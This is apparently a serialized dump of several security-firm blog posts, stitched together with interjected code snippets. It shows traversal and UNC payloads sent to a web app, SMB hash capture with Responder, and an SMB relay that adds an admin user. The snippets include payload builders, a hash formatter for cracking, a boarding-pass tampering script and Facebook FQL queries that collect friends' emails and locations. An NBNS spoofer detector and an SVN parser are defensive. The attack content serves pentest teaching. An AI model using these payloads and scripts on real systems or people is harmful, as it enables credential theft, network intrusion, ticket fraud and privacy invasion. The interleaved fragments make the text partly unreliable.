Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server:
GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
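The long `..\` prefix in the Id parameter above is mechanical to build. Here's a minimal sketch of generating payloads like this; the helper functions are my own illustration, not part of any tool mentioned in the post:

```python
# Build directory traversal and UNC payloads like the ones in these requests.
# Illustrative helpers only -- not from any specific tool.

def traversal_payload(target_file, depth=16, separator="\\"):
    """Prefix a target path with `depth` '..' hops to climb out of the web root."""
    hops = separator.join([".."] * depth)
    return hops + separator + target_file

def unc_payload(attacker_ip, filename):
    """Build a UNC path pointing at an attacker-controlled host."""
    return "\\\\" + attacker_ip + "\\" + filename

print(traversal_payload("windows\\win.ini"))
print(unc_payload("192.168.1.123", "test.pdf"))
```

Varying the `depth` and `separator` (forward slashes, URL-encoded variants, etc.) is usually necessary when probing a target, since the required number of hops and accepted encodings differ per application.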
This is a more traditional directory traversal attack. We're moving up several directories so that we can drop back down into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basics out of the way, let's see how we can leverage them against internally deployed web applications. Internally deployed web applications expose a much wider attack surface (RDP, SMB, etc.) on the web server, which makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why not try to access other systems in the environment? In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers running on Windows. Following our previous examples, we will use a UNC path to our attacking host, instead of report1.pdf, for the parameter. Here's an example request:
GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This forces the web server to look for test.pdf at 192.168.1.123, allowing us to capture (and attempt to crack) the network hashes for the account running the web server service. Here's an example of how we would use Responder.py to do the SMB capture:
python Responder.py -i 192.168.1.123
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:eth0
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123\IPC$

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123\test.pdf
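The "SMB complete hash" lines above are essentially already in the format hashcat's NetNTLMv2 mode (-m 5600) expects: USER::DOMAIN:challenge:NTProofStr:blob. A small sketch of assembling that line; every field value here is a placeholder for illustration, not real captured material:

```python
# Assemble captured NetNTLMv2 fields into a hashcat -m 5600 line.
# All values below are placeholders, not real captured material.

def netntlmv2_line(user, domain, challenge, nt_proof, blob):
    return f"{user}::{domain}:{challenge}:{nt_proof}:{blob}"

line = netntlmv2_line(
    "webserverservice",
    "EXAMPLE",
    "1122334455667788",                  # Responder's fixed challenge
    "58D4DB26036DE56CB49237BFB9E418F8",  # HMAC-MD5 proof from the capture
    "01010000000000002A5FB139",          # truncated blob, for illustration
)
print(line)
```

In practice you would just strip the stray whitespace from Responder's output and feed the line to the cracker as-is.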
Once we've captured the hashes, we can try to crack them with oclHashcat. If the server responds with LM hashes, you can use rainbow tables to speed things up. Once cracked, we can see where the credentials have access. Now let's pretend that we are not able to crack the hash for the web server account. We can instead try to relay the credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the SMB Relay module within Metasploit, and Responder has recently added support for SMB relay as well. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system.
Module options (exploit/windows/smb/smb_relay):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SHARE       ADMIN$           yes       The share to connect to
SMBHOST     192.168.1.124    no        The target SMB server
SRVHOST     192.168.1.123    yes       The local host to listen on.
SRVPORT     445              yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate
SSLVersion  SSL3             no        Specify the version of SSL that should be used 

Payload options (windows/adduser):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
CUSTOM                     no        Custom group name to be used instead of default
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
PASS      Password123!     yes       The password for this user
USER      netspi           yes       The username to create
WMIC      false            yes       Use WMIC on the target to resolve administrators group

Exploit running as background job.

Server started.
<------------Truncated------------>
Received 192.168.1.122:21251 EXAMPLE\webserverservice
LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM:
Authenticating to 192.168.1.124 as EXAMPLE\webserverservice...
AUTHENTICATED as EXAMPLE\webserverservice...
Connecting to the defined share...
Regenerating the payload...
Uploading payload...
Created OemWSPRa.exe...
Connecting to the Service Control Manager...
Obtaining a service manager handle...
Creating a new service...
Closing service handle...
Opening service...
Starting the service...
Removing the service...
Closing service handle...
Deleting OemWSPRa.exe...
Sending Access Denied to 192.168.1.122:21251 EXAMPLE\webserverservice
This may not be mind-blowing new information, but hopefully this gives you some good ideas on other ways to utilize directory traversal vulnerabilities. [post_title] => SMB Attacks Through Directory Traversal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => smb-attacks-through-directory-traversal [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:54 [post_modified_gmt] => 2021-04-13 00:05:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1133 [menu_order] => 722 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [60] => WP_Post Object ( [ID] => 1138 [post_author] => 10 [post_date] => 2013-11-15 07:00:34 [post_date_gmt] => 2013-11-15 07:00:34 [post_content] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things off, you should not replicate what I'm showing in this blog. Modifying your boarding passes could easily get you in trouble with the TSA, and no one has time for that. iOS 7 has made it a lot easier to export Passbook files, so I think it's time to point out some issues surrounding boarding passes in Passbook. First off, let's send ourselves a copy of a boarding pass. It's as simple as opening Passbook, opening the pass, and hitting the square in the bottom left corner of the pass. Boarding Once you've emailed the .pkpass file to yourself, right click on the file and extract (or unzip) the files. The .pkpass file is just a zip file with a different name. Bp This will result in the following files in the directory. Bp There will be two more files in there if you have Sky Priority. If you don't already have Sky Priority, the image files can be found here. These footer images are also used for the TSA Pre Check boarding passes. They just have the Pre Check logo appended to the right of the Sky Priority logo. 
So we have the boarding pass file. That's cool. What can we do with it? Well, if you have an Apple Developer's account ($99 - more info here), you can modify the boarding pass and email it back to yourself. iOS requires a signature file in order to trust the Passbook pass, and that file can only be generated with a proper Apple developer certificate - but that's something you get as an Apple developer. I have heard that this signature file is not required for loading Passbook files into the "Passbook for Android" application, but I have not seen it in practice. So if you're using the passes from an Android phone, there's a chance that you won't have to re-sign the pass. For this demonstration, we'll show how you can give yourself Sky Priority on a flight. All that you need to do is add the two Sky Priority images (linked above) to your directory and modify the pass.json file to say that you are in the SKY boarding zone. This can easily be done with a text editor. Here's what my pass.json file looks like after changing the boarding zone. Note that I changed the "zone" parameter. If you felt so inclined, you could change your seat number. If you wanted to social engineer your way into first class, this would be a good way to start. Again, I don't recommend doing any of this. This would not change your boarding pass barcode (also modifiable in pass.json), which is "tamper evident" and is supposed to be signed by a Delta private key. I have not tested this, but if the airport barcode scanners are not checking the signature, you would be able to modify the barcode as well. Again, I have not tested this or seen it in practice, but I have seen documentation that states the security data (signature) is optional. There's more info on the barcode standard here. If you are going to re-sign the pass, you will also need to modify the passTypeIdentifier and teamIdentifier fields (in the pass.json) to match your Apple Developer's account.
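The unzip-and-edit workflow described above can be sketched in a few lines; this is a hedged illustration, assuming a .pkpass archive with a "zone" key at the top level of pass.json (the real JSON structure varies per airline, so adjust the key path as needed):

```python
# A .pkpass file is just a zip archive containing pass.json, so we can
# extract it, change the boarding zone, and drop the stale signature
# files before re-signing. Paths and the "zone" key location are
# illustrative assumptions, not taken from a real Delta pass.
import json
import os
import zipfile

def edit_pass(pkpass_path, out_dir, new_zone="SKY"):
    with zipfile.ZipFile(pkpass_path) as z:
        z.extractall(out_dir)
    pass_json = os.path.join(out_dir, "pass.json")
    with open(pass_json) as f:
        data = json.load(f)
    data["zone"] = new_zone  # adjust to the pass's actual JSON layout
    with open(pass_json, "w") as f:
        json.dump(data, f, indent=2)
    # manifest.json and signature were generated by the original signer;
    # they must be deleted and regenerated with your own certificate.
    for stale in ("manifest.json", "signature"):
        path = os.path.join(out_dir, stale)
        if os.path.exists(path):
            os.remove(path)
```

After running something like this, the directory is ready to be re-signed with the SignPass utility and your own developer certificate.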
If these do not match your Apple info, the pass will not validate when you go to sign and/or use it. There's some more info on signing your first pass here. You'll also want to delete your manifest.json and signature files, as those were generated by the original pass signer. Your final directory will look like this: At this point you will want to run the SignPass utility on the directory. Your output will look like this. And you will end up with a .pkpass file that you can email to your iOS device. Now, let's say you wanted to make it easier to upgrade your priority for all of your flights. It would not be hard to make a script to listen on an email inbox for a .pkpass file, unzip it, modify it, re-sign it, and email the pass back to the sender. On that note, don't send me your boarding passes. I don't have this script set up and I don't want your boarding passes. This issue is not limited to Delta. Any app that uses Passbook is vulnerable to pass tampering attacks. This has been a problem for a while. Now that Passbook allows easy exports of .pkpass files, messing with the files is a lot easier. [post_title] => Sky Prioritize Yourself [post_excerpt] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things... [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sky-prioritize-yourself [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:36 [post_modified_gmt] => 2021-06-08 21:51:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1138 [menu_order] => 726 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [61] => WP_Post Object ( [ID] => 1142 [post_author] => 10 [post_date] => 2013-10-21 07:00:39 [post_date_gmt] => 2013-10-21 07:00:39 [post_content] =>

A Primer on Facebook Email Privacy

Facebook has a long and storied history of having confusing security and privacy settings. As of late, there are three different settings (that I can find) that you can configure to control access to your email address(es). Each of these settings controls a specific facet of your email address privacy, but in this post we will focus on the third setting in the screen shot below. These settings are responsible for your email privacy, both on your profile and for your friends being able to see your email. This setting can be found by going to the “About” section of your profile and editing your contact information. The locks are the configuration settings for your emails being accessible (by friends or publicly) and the circles are the configuration settings for your email showing up in your timeline. The default setting (that I’ve seen) for your email privacy on Facebook is “Friends”. But this is kind of an odd setting to have, as you can’t access or look up a friend’s email through the web interface of Facebook (assuming it is hidden from the timeline/profile). From what I can tell, this setting is primarily available for importing your Facebook contacts to other services (Gmail, Yahoo, etc.). I find this interesting, as most people assume that they have successfully hidden their email address on Facebook when they choose not to display it on their profile. Most of my friends are currently hiding both email addresses (private and facebook.com addresses) or they are just showing their @facebook.com email address in their profile. However, very few of my friends have their private email address set as available to “Only Me.” The following walkthrough will go over how to enumerate your available Facebook friends’ email addresses by manipulating traffic from the iOS Facebook application.

The Attack

We’ve previously covered a few different attacks on the NetSPI blog regarding proxies and iOS apps. This will be yet another example of abusing permissions given to a mobile app to get access to data. The setup for this attack is pretty simple. We will be using the Burp proxy from Portswigger to intercept the iOS traffic. First, install the Portswigger CA on your iOS device. This is needed to intercept the SSL traffic. Next, proxy your iOS traffic through Burp, and start looking at and modifying/replaying application traffic. I won’t get into the full details here, but the official instructions for setting up the Burp Proxy are here - https://portswigger.net/burp/help/proxy_options_installingCAcert.html#iphone After opening up the Facebook application, we see the following request in the traffic when we go to look at our messages:
GET /method/fql.multiquery?sdk=ios&queries=%7B%22group_conversations%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20pic_hash%2C%20participants%2C%20%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20%20WHERE%20timestamp%20%3E%201378149789000%20and%20folder%3D%27inbox%27%20and%20is_group_conversation%3D1%20%20and%20not%20archived%20order%20by%20timestamp%20desc%20limit%203%20offset%200%22%2C%22group_conversation_participants_profile_pic_urls%22%3A%22SELECT%20id%2C%20size%2C%20url%20FROM%20square_profile_pic%20WHERE%20size%20IN%20%2888%2C%20148%29%20AND%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22favoriteRanking-Groups%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%20and%20is_group%22%2C%22favorites%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20favorite_id%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%29%22%2C%22favoriteRanking%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%22%2C%22group_conversations_favorites%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20%20pic_hash%2C%20participants%2C%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20WHERE%20thread_fbid%20IN%20%28select%20favorite_id%20from%20%23favoriteRankingGroups%29%22%2C%22group_conversation_participants%22%3A%22SELECT%20id%2C%20name%20FROM%20profile%20WHERE%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22top_friends%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20uid2%20FROM%20friend%20WHERE%20uid1%3Dme%28%29%20order%20by%20communication_rank%20desc%20LIMIT%2015%29%22%7D&sdk_version=2&access_token=REDACTED&format=json&locale=en_US HTTP/1.1 Host: api.facebook.com 
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: REDACTED
Connection: keep-alive
Accept-Language: en-us
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 [FBAN/FBIOS;FBAV/6.4;FBBV/290891;FBDV/iPhone4,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1.3;FBSS/2; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/1]
This request selects your conversations along with information about the people involved in them. It’s a pretty complicated query, but that won’t matter in a minute. If you want to use this as a tutorial, this is the request that you will want to right-click on and “send to repeater” in Burp. Here’s the unencoded query:
{"group_conversations":"SELECT thread_id, name, title, is_group_conversation, pic_hash, participants,  thread_fbid, timestamp FROM unified_thread  WHERE timestamp > 1378149789000 and folder='inbox' and is_group_conversation=1  and not archived order by timestamp desc limit 3 offset 0","group_conversation_participants_profile_pic_urls":"SELECT id, size, url FROM square_profile_pic WHERE size IN (88, 148) AND id IN (SELECT participants.user_id FROM #group_conversations)","favoriteRankingGroups":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me() and is_group","favorites":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT favorite_id FROM messaging_favorite WHERE uid=me())","favoriteRanking":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me()","group_conversations_favorites":"SELECT thread_id, name, title, is_group_conversation,  pic_hash, participants, thread_fbid, timestamp FROM unified_thread WHERE thread_fbid IN (select favorite_id from #favoriteRankingGroups)","group_conversation_participants":"SELECT id, name FROM profile WHERE id IN (SELECT participants.user_id FROM #group_conversations)","top_friends":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me() order by communication_rank desc LIMIT 15)"}
What we’re going to do is make our own query to get more information about our friends, returned in a nice, easy-to-parse format. Here’s the query that we’re going to use to select our friends’ email addresses: {" friends_email":"SELECT uid, email, contact_email FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me())"} You will have to URL encode the spaces in the query, but you can just paste this over the previous query that we intercepted earlier (and passed to repeater) and URL encode it in Burp. This will select the Facebook user ID, along with any email or contact email addresses associated with the account. The UID can also be handy for quickly pulling up someone’s account, i.e. https://www.facebook.com/4 Here’s a sample of what we get back from the query: [{"name":"friends_email","fql_result_set":[{"uid":13931306,"email":"karl\u0040example.com","contact_email":"karl\u0040example.com"}]}] So we can access our friends’ email addresses. This may not seem like a big deal to some people, but if you have friends like mine, then your friends may not want their real email address publicly available through Facebook. If you can’t tell by the screen shot above, my friends appreciate their privacy. While we’re requesting stuff that your friends may not want you to have access to, let’s look at some other interesting info that you can access. Some of my personal favorites:
  • Location Data for check-ins:
    • {" friends_locations":"SELECT coords, message, timestamp FROM location_post WHERE author_uid in (SELECT uid2 FROM friend WHERE uid1=me())"}
  • Publicly liked pages:
    • {" URLs_liked":"SELECT url FROM url_like WHERE user_id =4"}
  • Events information:
    • {"z_events":"SELECT description, host FROM event WHERE creator=4"}
  • Friends of a friend:
    • {"friends_of":"SELECT+uid2+FROM+friend+WHERE+uid1=4"}
From the Facebook Developers page, here’s the schema that you can use to query FQL - https://developers.facebook.com/docs/reference/fql
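Substituting your own FQL multiquery into the intercepted request is just a matter of URL-encoding it. A hedged sketch of building such a request URL, using the endpoint and parameter names visible in the captured request above (the access token would be whatever Burp captured for your session; FQL has since been retired by Facebook, so this reflects the API as of the post's writing):

```python
# Build a fql.multiquery URL like the one intercepted from the iOS app.
# Endpoint and parameter names come from the captured request; the token
# is a placeholder.
from urllib.parse import urlencode

def build_fql_url(queries, access_token):
    params = {
        "queries": queries,        # JSON object mapping query names to FQL
        "access_token": access_token,
        "format": "json",
        "sdk": "ios",
    }
    return "https://api.facebook.com/method/fql.multiquery?" + urlencode(params)

friends_email = ('{"friends_email":"SELECT uid, email, contact_email FROM user '
                 'WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me())"}')
url = build_fql_url(friends_email, "REDACTED")
print(url)
```

`urlencode` takes care of escaping the spaces, quotes, and braces, which is the same thing you would otherwise do by hand in Burp's repeater.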

Conclusion

I did reach out to Facebook about this issue, but since this is “intended” functionality, they were not very interested in hearing about this. The functionality of the email privacy setting doesn’t make a whole lot of sense, but I will be setting my email address to private for all of my accounts. [post_title] => Facebook Friends, Your Email Address Isn’t that Private [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-friends-your-email-address-isnt-that-private [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:34 [post_modified_gmt] => 2021-06-08 21:51:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1142 [menu_order] => 729 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [62] => WP_Post Object ( [ID] => 1148 [post_author] => 10 [post_date] => 2013-09-05 07:00:50 [post_date_gmt] => 2013-09-05 07:00:50 [post_content] =>

One of the easiest ways for us to capture and/or relay hashes on the network is through NBNS spoofing. We will primarily use Responder.py or the Metasploit NBNS spoofing module. Both of these tools can be great for attackers to use during a pen test, but remediation options for fixing the underlying issues are limited. In response to a lack of available mitigation options, I’ve written a script to help identify NBNS spoofers on the network.

This script makes frequent NBNS requests for a non-existent host name (the default is NETSPITEST) and it then listens for NBNS responses. Since there shouldn’t be any responses for this host name, the listener will sit idle until a response is received. If a response is received, we will know that there’s a spoofer on the network. Once a spoofer is identified, email alerting and syslogging options are available to alert network administrators of the issue.
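The NBNS probes the script sends encode the queried host name using NetBIOS "first-level" encoding (RFC 1001/1002): the name is padded to 15 characters, a type byte is appended, and each byte is split into two nibbles, each offset by ord('A'). A minimal sketch of that encoding; this is my own illustration of the protocol, not code from SpoofSpotter:

```python
# NetBIOS first-level name encoding, as used in NBNS query packets.
# Illustrative sketch, not taken from the SpoofSpotter source.

def netbios_encode(name, name_type=0x00):
    """Encode a NetBIOS name: pad to 15 chars, append the type byte,
    then expand each byte into two characters in the range A-P."""
    raw = name.ljust(15)[:15].upper().encode("ascii") + bytes([name_type])
    out = []
    for b in raw:
        out.append(chr((b >> 4) + ord("A")))  # high nibble
        out.append(chr((b & 0x0F) + ord("A")))  # low nibble
    return "".join(out)

# e.g. "FRED" with type 0x00 becomes "EGFCEFEE" + "CA"*11 + "AA"
print(netbios_encode("FRED"))
```

A detector like the one described above would encode its unique probe name (NETSPITEST by default) this way, embed it in an NBNS query packet broadcast over UDP 137, and then flag any host that answers.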

Example Usage:

sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n NBNSHOSTQUERY -s 192.168.1.2 -e karl.fosaaen@example.com -f test.log

This example command makes NBNS queries for the custom host name NBNSHOSTQUERY and listens for spoofed responses. It will send an email alert to karl.fosaaen@example.com when an attack is identified, and responses will also be logged to test.log.

Required arguments:

-i 192.168.1.110    The IP of this host
-b 192.168.1.255    The broadcast IP of this host

Optional arguments:

-h, --help              Show this help message and exit
-f, -F /home/nbns.log   File name to save a log file
-S true                 Log to local syslog - this is pretty beta
-e you@example.com      The email to receive alerts at
-s 192.168.1.109        Email server to send emails to
-n EXAMPLEDOMAIN        The string to query with NBNS; this should be unique
-R true                 The option to send garbage SMB auth requests to the attacker (not implemented yet)
-c true                 Continue emailing after a detection; could lead to spam

Example Script Output:

$ sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n testfakehostname -s 192.168.1.2 -e karl.fosaaen@netspi.com -f test.log
Starting NBNS Request Thread...
Starting UDP Response Server...
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:47.497274 from host 192.168.1.162
Email Sent
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:49.549245 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:51.600981 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:53.657044 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:55.721037 from host 192.168.1.162
^C
Stopping Server and Exiting...

The script is available out on NetSPI’s github page: https://github.com/NetSPI/SpoofSpotter

There is an additional option that I’m currently working on to make your pen tester especially annoyed. The -R flag will set the SMB response option to try to authenticate with the spoofer’s system. Since NBNS spoofing attacks are used to capture (or relay) hashes, why not send the attacker some hashes? Why not send a ton of them and make the attacker waste time trying to crack them, or just overload their logs? This will probably annoy an attacker more than anything else, but anything that makes the attack harder may give you extra time to respond.

On that note, it was a little difficult for me to write this tool, as I have a feeling it will come back to haunt me in a future pen test. Feel free to send me any comments or feedback on the script through this blog or through our github page.

Special thanks go out to our client who had the idea for this script.

[post_title] => Identifying Rogue NBNS Spoofers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => identifying-rogue-nbns-spoofers [to_ping] => [pinged] => [post_modified] => 2021-05-03 20:18:24 [post_modified_gmt] => 2021-05-03 20:18:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1148 [menu_order] => 735 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) [63] => WP_Post Object ( [ID] => 1150 [post_author] => 10 [post_date] => 2013-08-20 07:00:41 [post_date_gmt] => 2013-08-20 07:00:41 [post_content] => Frequently during external and web application penetration tests, we run into SVN entries files on web servers. These files are sometimes created as part of the SVN commit process and can lead to the disclosure of files (and source-code) that have been added to the web directory. This can be especially impactful for assessments, where there may be vulnerable pages (and/or configuration files) that are not clearly advertised from the main web site (i.e.: admin_backdoor.jsp or web.config). The files are typically laid out in lists of files and directories followed by their type (dir, file) on the next line: registry dir admin_login.jsp file. Additionally, there may be source files accessible through the svn-base files (i.e.: /.svn/text-base/ExamplePage.jsp.svn-base). You can consider these files like backups of the originals that (hopefully) won’t execute on the server. Sometimes, the server sees these files with their original extension (.jsp) and you may have trouble getting at the source. The entries files can typically be found in each directory that is used by SVN, as well as any subdirectories. So if a directory shows up in your entries list, it’s worth looking in that directory for another entries file. 
I got tired of manually going through each of these entries files, so I wrote a script to automate listing the files, source files, and directories into an HTML file. The script also goes into each identified directory to find more entries files to spider.
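The parsing step described above (a name on one line, its type on the next) can be sketched simply. The NetSPI script is PowerShell; this is a simplified, illustrative Python equivalent that ignores the extra header fields real entries files can contain:

```python
# Parse the name/type pairs out of an SVN entries file.
# Simplified sketch; real entries files include version headers and
# other fields that the actual SVNentriesParser script handles.

def parse_entries(text):
    """Return (directories, files) listed in an SVN entries file."""
    dirs, files = [], []
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    # Each entry is a name line immediately followed by its type line.
    for name, kind in zip(lines, lines[1:]):
        if kind == "dir":
            dirs.append(name)
        elif kind == "file":
            files.append(name)
    return dirs, files

sample = "registry\ndir\nadmin_login.jsp\nfile\n"
print(parse_entries(sample))
```

A spider built on this would then request `<dir>/.svn/entries` for every directory returned, repeating until no new entries files are found.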

Script Usage:

SVNtoDIR   https://somewebsite.com/DIR/.svn/entries  SVNbaseDIR (optional)

Output:

The script will output a directory named after the directory that you’re starting in (i.e.: DIR), and in that directory will be an HTML file (DIR.html) that you can use to start navigating files. Links to the svn-base files are included on the page and show up with the .svn-base file extension. If you are familiar with the default Apache directory listing page, this should be pretty easy for you to navigate. I’ve also added sorting for the table; just click on Name or Type at the top. Additionally, I’ve added an option for a second parameter that you can use for outputting the .svn-base files to a directory. Be careful with this one, as you can potentially end up downloading the entire web root. The script is available on the NetSPI GitHub - https://github.com/NetSPI/SVNentriesParser [post_title] => Parsing SVN Entries Files with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => parsing-svn-entries-files-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:52 [post_modified_gmt] => 2021-04-13 00:05:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1150 [menu_order] => 738 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [64] => WP_Post Object ( [ID] => 1152 [post_author] => 10 [post_date] => 2013-07-22 07:00:42 [post_date_gmt] => 2013-07-22 07:00:42 [post_content] => It’s not every day that we run into kiosks, terminals, etc. that have HyperTerminal as one of the available applications. This may be a corner case, but it’s another example to add to Scott’s blog about break out methods. In this example, we encountered a terminal setup, where the system was a fairly locked down Windows XP machine. HyperTerminal was one of the only applications in the start menu, and other functionality (shortcut keys, right-click, run) was not available. 
The method here is pretty simple, but now you can add HyperTerminal as another program to use for breaking out.

Steps to Exploit

First off, we want to open up HyperTerminal and create a new connection to write to. In this example, we’ll just use our non-connected COM1 port as a connection. This is pretty easy to set up; it’s more or less clicking Next until you are dropped into the HyperTerminal window below.
Hyperterm
